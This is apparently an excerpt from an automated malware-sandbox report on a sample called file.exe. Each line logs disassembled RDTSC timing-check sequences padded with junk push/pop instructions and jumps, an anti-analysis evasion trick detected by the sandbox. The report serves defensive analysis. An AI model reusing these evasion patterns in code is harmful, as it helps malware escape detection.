                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CEC12 second address: 6CEC28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8B98B0Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007F46B8B98B06h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3F70 second address: 6D3F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3F75 second address: 6D3F7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3997 second address: 6D39B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA1A5h 0x00000007 jne 00007F46B8DCA196h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D39B6 second address: 6D39C0 instructions: 0x00000000 rdtsc 0x00000002 je 00007F46B8B98B0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3B55 second address: 6D3B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F46B8DCA196h 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3B60 second address: 6D3B66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3B66 second address: 6D3B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3B6C second address: 6D3B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3CBD second address: 6D3CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3CC1 second address: 6D3CCB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F46B8B98B06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3CCB second address: 6D3CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3CD1 second address: 6D3CD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3CD6 second address: 6D3CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jbe 00007F46B8DCA196h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 push edi 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop edi 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DC450 second address: 6DC456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DA950 second address: 6DA954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DA954 second address: 6DA95A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DA95A second address: 6DA960 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DA960 second address: 6DA966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DA966 second address: 6DA96A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DABAE second address: 6DABB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DABB2 second address: 6DABB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DABB6 second address: 6DABE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F46B8B98B14h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jo 00007F46B8B98B06h 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop esi 0x00000015 pop ebx 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DABE0 second address: 6DABE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DAD51 second address: 6DAD61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F46B8B98B06h 0x0000000a pop edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DAD61 second address: 6DAD93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F46B8DCA1A7h 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jg 00007F46B8DCA196h 0x0000001e push esi 0x0000001f pop esi 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DAE92 second address: 6DAEBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8B98B17h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007F46B8B98B0Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DAEBD second address: 6DAF01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F46B8DCA1A9h 0x00000008 jc 00007F46B8DCA196h 0x0000000e jnp 00007F46B8DCA196h 0x00000014 popad 0x00000015 jmp 00007F46B8DCA19Dh 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F46B8DCA19Ah 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DAF01 second address: 6DAF0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F46B8B98B06h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DB19E second address: 6DB1A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DB1A2 second address: 6DB1B9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F46B8B98B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F46B8B98B0Dh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F019E second address: 6F01AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F46B8DCA196h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F01AD second address: 6F01B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EFB6A second address: 6EFB7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F46B8DCA19Fh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F50C4 second address: 6F50CA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70232A second address: 702334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F46B8DCA196h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 702334 second address: 70234C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F46B8B98B06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007F46B8B98B0Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70234C second address: 702356 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708A72 second address: 708A8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F46B8B98B12h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708A8A second address: 708A9C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jne 00007F46B8DCA196h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708C18 second address: 708C4A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F46B8B98B0Dh 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jng 00007F46B8B98B06h 0x00000017 pushad 0x00000018 popad 0x00000019 jl 00007F46B8B98B06h 0x0000001f jmp 00007F46B8B98B0Ah 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709032 second address: 709037 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70943D second address: 709441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70D43B second address: 70D452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F46B8DCA196h 0x0000000a popad 0x0000000b pushad 0x0000000c ja 00007F46B8DCA196h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7108EF second address: 7108F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7108F5 second address: 7108F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7108F9 second address: 710933 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F46B8B98B06h 0x00000009 pop esi 0x0000000a jns 00007F46B8B98B0Ch 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007F46B8B98B19h 0x00000018 jc 00007F46B8B98B0Eh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710933 second address: 71093F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71093F second address: 710943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710943 second address: 71094D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F46B8DCA196h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F632 second address: 61F637 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F637 second address: 61F63D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712EC3 second address: 712ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712ECA second address: 712F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F46B8DCA1A5h 0x0000000b popad 0x0000000c jmp 00007F46B8DCA1A6h 0x00000011 popad 0x00000012 pushad 0x00000013 push edi 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F46B8DCA19Eh 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712F16 second address: 712F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712F1A second address: 712F1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 714740 second address: 71474A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71474A second address: 714750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 714750 second address: 71475A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F46B8B98B06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A1E3 second address: 72A1ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F46B8DCA196h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A1ED second address: 72A1FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F46B8B98B06h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A1FC second address: 72A203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A07D second address: 72A09A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F46B8B98B17h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A09A second address: 72A0A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72CAED second address: 72CB08 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F46B8B98B15h 0x00000008 jmp 00007F46B8B98B0Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72CB08 second address: 72CB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72CB0C second address: 72CB22 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F46B8B98B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F46B8B98B0Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72CB22 second address: 72CB26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72CC9E second address: 72CCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F46B8B98B08h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72CCAB second address: 72CCB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F46B8DCA196h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72CCB5 second address: 72CCB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72CCB9 second address: 72CCF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F46B8DCA1A2h 0x00000013 pop ebx 0x00000014 push ecx 0x00000015 jns 00007F46B8DCA196h 0x0000001b jmp 00007F46B8DCA1A1h 0x00000020 pop ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72CCF7 second address: 72CCFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72CCFD second address: 72CD01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72CD01 second address: 72CD18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8B98B0Dh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72CD18 second address: 72CD1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C604 second address: 73C61F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F46B8B98B0Eh 0x0000000c jng 00007F46B8B98B06h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C61F second address: 73C62F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F46B8DCA196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C62F second address: 73C635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C635 second address: 73C63E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C63E second address: 73C642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C642 second address: 73C646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C646 second address: 73C64C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73CBCC second address: 73CBD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D04D second address: 73D053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D053 second address: 73D061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D061 second address: 73D098 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F46B8B98B06h 0x00000008 jmp 00007F46B8B98B16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F46B8B98B0Fh 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 pop eax 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D1E9 second address: 73D209 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA1A4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D209 second address: 73D20D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D39B second address: 73D3BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA1A4h 0x00000007 jc 00007F46B8DCA196h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D3BE second address: 73D3D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F46B8B98B13h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D54B second address: 73D551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D551 second address: 73D55B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F46B8B98B06h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7405C9 second address: 740660 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA1A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F46B8DCA1A1h 0x00000010 nop 0x00000011 mov edx, dword ptr [ebp+1244CC6Eh] 0x00000017 push 00000004h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007F46B8DCA198h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D2DB4h], edx 0x00000039 call 00007F46B8DCA199h 0x0000003e push eax 0x0000003f jmp 00007F46B8DCA1A2h 0x00000044 pop eax 0x00000045 push eax 0x00000046 jmp 00007F46B8DCA1A7h 0x0000004b mov eax, dword ptr [esp+04h] 0x0000004f push ecx 0x00000050 push eax 0x00000051 push edx 0x00000052 jnp 00007F46B8DCA196h 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740660 second address: 74067F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F46B8B98B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F46B8B98B10h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74067F second address: 740684 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740684 second address: 7406AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F46B8B98B16h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
